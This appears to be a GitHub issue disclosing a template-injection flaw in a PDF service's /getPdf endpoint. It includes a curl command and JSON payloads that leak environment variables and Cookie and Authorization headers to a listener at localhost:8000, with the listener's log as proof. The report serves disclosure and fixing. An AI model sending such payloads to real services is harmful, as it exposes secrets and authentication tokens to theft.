Data exfil due to user controlled template
jessesomerville opened this issue · comments
The /getPdf
endpoint takes the body of the post request and uses it as a text/template
with the functions provided by sprig.TxtFuncMap()
. This allows for the exfil of the server's environment variables and potentially auth tokens included in the request by middleware.
input.json:
{
"options": {
"print_media_type": true
},
"pages": [
{
"Location": "http://localhost:8000?{{env .UserAgent}}"
}
]
}
curl -d '@input.json' -X POST http://localhost:8080/getPdf -A "PWD" --output test.pdf
Log from python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [04/Mar/2023 17:15:05] "GET /?/home/jsomerville/go/src/github.com/txn2/txpdf HTTP/1.1" 200 -
Or if this is running as a microservice you could steal the request headers that may have been added for S2S auth:
{
"options": {
"print_media_type": true
},
"pages": [
{
"Location": "http://localhost:8000?{{.Header.Get `Cookie`}};;{{.Header.Get `Authorization`}}"
}
]
}
added security section to README